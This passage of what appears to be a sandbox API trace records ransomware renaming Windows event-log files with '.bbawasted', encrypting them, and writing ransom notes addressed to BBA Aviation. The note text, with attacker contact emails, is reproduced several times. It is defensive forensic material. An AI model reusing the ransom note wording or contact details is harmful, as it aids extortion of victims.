[0196.526] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0196.527] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6240) returned 1 [0196.527] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0196.527] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0196.528] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a68a0) returned 1 [0196.528] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0196.528] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0196.586] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0196.587] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0196.587] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0196.587] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]CxBgxXJ9PMb208LRNEd/jzvXu32paqdS3ECTEjADE2fkJXnXwHH0OUyE5sr3bzNI\r\nkjR11n3+reJlXpYzVd8nghP+bwSNR6LYCRLtimIlKLApGvU+55UpFP1tKbRsB1Ct\r\n4ns8IrRq5BKm/rEQumdo2kRr+vVZwhKGSLDyAAl7oMkARR6YBD6CLEnJxWArkYc0\r\nygAQB0H77TcvMIHqoBE/MGIc31L64Kn5AKKVwLm3vC7qkQmU5D4Ux9PeUKdg3Euh\r\nHp1sb/o/GagF4hbt2mkzaAsXAIv3k1ok9R/T7kud3Wofn9gK60mQAh27fFL7YSL4\r\nttKKVx72/6CYFWpoXu7NjBiR5dPt/p4xZfZo0wPruRacXeX7qn5jm7O3IFuPKrq2\r\nmzin9wMDX8P32AXnOYw5JbIqf/emVEVGCj767jqqkxkV9xmOFCa1GRIn5VFb2K9k\r\nePOfihGMG5HwIGpz+ihW7b8ewtVs8hUvgZtpk/LooGeTZjsx2y4tUbUio29Dg3QR\r\n33H9r1DloigU+4typBafNiXcFdlet1bNzZTVG2VjnUyJCZh71EWpMO1YVaJv96XT\r\nZ3jdJ4T7DMXknI7d2dNb0Pjc57kGR2EsB+PJCMKudzdK/2BE+n8v2hwkTq9cPkSu\r\n7meMwEMoq9IbkGJzgnbp9HmmVv3RPAIcytbKm/OkJpi=[end_key]\r\nKEEP IT\r\n") returned 984 [0196.587] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0196.587] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0196.587] SetEndOfFile (hFile=0x28c) returned 1 [0196.590] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0196.590] CloseHandle (hObject=0x28c) returned 1 [0196.596] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0196.596] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69f370 | out: hHeap=0x660000) returned 1 [0196.596] _aulldvrm () returned 0x0 [0196.596] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a64e8) returned 1 [0196.597] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0196.597] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0196.597] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned 57 [0196.597] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27c) returned 0x6aecf0 [0196.597] lstrcpyW (in: lpString1=0x6aed62, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0196.597] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0196.598] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6130) returned 1 [0196.598] CryptGenRandom (in: hProv=0x6a6130, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0196.598] CryptReleaseContext (hProv=0x6a6130, dwFlags=0x0) returned 1 [0196.598] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0196.599] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0196.603] SetEndOfFile (hFile=0x28c) returned 1 [0196.603] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.603] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0196.603] lstrcpyW (in: lpString1=0x6aed62, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0196.603] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx.bbawasted")) returned 1 [0196.605] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-smbclient%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0196.605] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0196.605] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0196.605] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0196.605] CloseHandle (hObject=0x280) returned 1 [0196.612] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0196.613] CloseHandle (hObject=0x294) returned 1 [0196.613] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0196.613] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6708) returned 1 [0196.614] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0196.614] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0196.614] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6680) returned 1 [0196.615] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0196.615] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0196.624] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0196.625] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0196.625] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0196.625] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]P1UtmFICn3d9N3garZiL5QfH98+wV9xCtTRAMN+XXt5C3fh3pveSgHVVwrUfyf/f\r\nKLWQrs9j1nsADducNXiGRfXqgIunceppivWma9YVvqvmbcYxPwt8uRTOLLR8LfrY\r\npDl9KLjjj2G27lmWfwX4LFybrXKZUQnjoVSuy6Ico8JQxuaoSQzrrt9aUMB0YDoU\r\nr6FCa468ZLpHZpci0wQEDWGsfU6OJqxwG71GuS2JS22tWUO/5kakz+C+ugXCMEiE\r\n+wivWgXaWeoqYpSdc2JxzeD9pMV1yllBEl6fUQ+cO0nlHx0oXoug6XOAFdIYZZ8D\r\noZbcTT/DvNqPIlXE2qMYBSb4mPcTQwv2mMa1X0HgfokC8oMlFbHuvyEDJ/b94rUn\r\nDuRBJE98FdLDUqrrXuU4Bemn5S6B0bBdTN5sW4c0AzBF7hWFJBUoJ6F0B5a5PhVm\r\nNnA7zut/g/vgztKgYLIYXMro4304LJ2pm0CDkidA/fpd/kpfnLx7djF5YQwtTjpL\r\nkP/ejfjvXHiKrR53TX7IhME6WOigs2b1d74oHAdEUsLPsgdCZNwGM/vE47dlCtZL\r\ntGIOBnA4UhKod/Z52HMVjQ75lpiW4h4KEUzhnQW8f5zVciHRK75XohWaIPb9lSjR\r\nd6YycGDsCFf40os+GOo3RWRoUZPfw6bSfyBgvKgZ1Uw=[end_key]\r\nKEEP IT\r\n") returned 984 [0196.625] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0196.625] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0196.625] SetEndOfFile (hFile=0x28c) returned 1 [0196.627] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0196.628] CloseHandle (hObject=0x28c) returned 1 [0196.682] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0196.683] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69f440 | out: hHeap=0x660000) returned 1 [0196.683] _aulldvrm () returned 0x0 [0196.683] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6680) returned 1 [0196.683] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0196.683] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0196.683] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 54 [0196.683] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x276) returned 0x6aecf0 [0196.684] lstrcpyW (in: lpString1=0x6aed5c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0196.684] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0196.684] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a5e88) returned 1 [0196.684] CryptGenRandom (in: hProv=0x6a5e88, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0196.684] CryptReleaseContext (hProv=0x6a5e88, dwFlags=0x0) returned 1 [0196.684] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0196.704] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0196.706] SetEndOfFile (hFile=0x28c) returned 1 [0196.706] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.706] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0196.706] lstrcpyW (in: lpString1=0x6aed5c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0196.706] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx.bbawasted")) returned 1 [0196.758] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0196.759] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0196.759] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0196.759] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0196.759] CloseHandle (hObject=0x294) returned 1 [0196.786] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0196.787] CloseHandle (hObject=0x280) returned 1 [0196.787] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0196.787] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6a38) returned 1 [0196.787] CryptGenRandom (in: hProv=0x6a6a38, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0196.787] CryptReleaseContext (hProv=0x6a6a38, dwFlags=0x0) returned 1 [0196.787] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6c58) returned 1 [0196.788] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0196.788] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0196.798] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0196.798] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0196.799] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0196.799] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]ksz0jM4W8wK4v3SeCkyNYM4ZGCt0GJ999+OM3z2JqbA7/oGEFFVrU6wDF07kB0eK\r\nAsgeciV7Ioq4KwJ1MutxqLx6GOq5QkaMty5+K+KEk50m4UxSsFcfgczCNt43yWZB\r\n09bt9T1hftQAv6Ldg5caabDWlcymVM+TN/hNHamsYSidnP30fuC5PaPRmbQ0BVO/\r\nBAhE1dY/nJffDxoLZ+NFMtFPTV1xLc8Dg7TIwTkPK9EklujVRHhW27cYJu3u4A1N\r\nAMbs/x8SrBujypNnNTe5gR+tnmUc76eTDdRwcDYLzwVpUsC0HrOS6AcTa0I7/M9i\r\ns2qrY0TbJu+cW+jOfQ2/V9yaVcNgaC9sK12DQ36r1LCHRJuzuft2rlLCBu3dl2w0\r\nYfGGvO7Y87G7MlaAxg8GWJpLq+MP1qCuASKljtWcRV9bNj2zRYMUwqN2zgQzfFki\r\npgo0OquxyOcVckv22+FQOFZboNDznUvKj2QGDfE+gc7FSSbTGvd+XlW/WvOORi8A\r\n4O8z4iNRGryWalQDEwZNDPFNfgZwVpGRu3s1TVS80GTsxqHIfKEGAOAByDiWFBX/\r\nhSz85Hayeaf9rtGZVR4WThh8fBhS7Er02mgSqsBiFmgt8qSrfxZA1TXFjc5QHXq9\r\ngmNUcCcBgOlIW31dIsXpTcaGZ+iRRqgg3rHqwoTFwMj=[end_key]\r\nKEEP IT\r\n") returned 984 [0196.799] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0196.799] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0196.799] SetEndOfFile (hFile=0x28c) returned 1 [0196.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0196.802] CloseHandle (hObject=0x28c) returned 1 [0196.811] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0196.811] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69f510 | out: hHeap=0x660000) returned 1 [0196.811] _aulldvrm () returned 0x0 [0196.811] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6818) returned 1 [0196.812] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0196.812] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0196.812] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 51 [0196.812] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x270) returned 0x6aecf0 [0196.812] lstrcpyW (in: lpString1=0x6aed56, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0196.812] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0196.813] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6708) returned 1 [0196.813] CryptGenRandom (in: hProv=0x6a6708, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0196.813] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0196.813] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0196.814] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0196.816] SetEndOfFile (hFile=0x28c) returned 1 [0196.816] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.816] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0196.816] lstrcpyW (in: lpString1=0x6aed56, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0196.816] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx.bbawasted")) returned 1 [0196.967] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0196.967] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0196.968] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0196.968] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0196.968] CloseHandle (hObject=0x280) returned 1 [0196.976] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0196.977] CloseHandle (hObject=0x294) returned 1 [0196.977] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0196.977] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6a38) returned 1 [0196.978] CryptGenRandom (in: hProv=0x6a6a38, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0196.978] CryptReleaseContext (hProv=0x6a6a38, dwFlags=0x0) returned 1 [0196.978] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6130) returned 1 [0196.979] CryptGenRandom (in: hProv=0x6a6130, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0196.979] CryptReleaseContext (hProv=0x6a6130, dwFlags=0x0) returned 1 [0196.992] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0196.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0196.992] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0196.992] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING 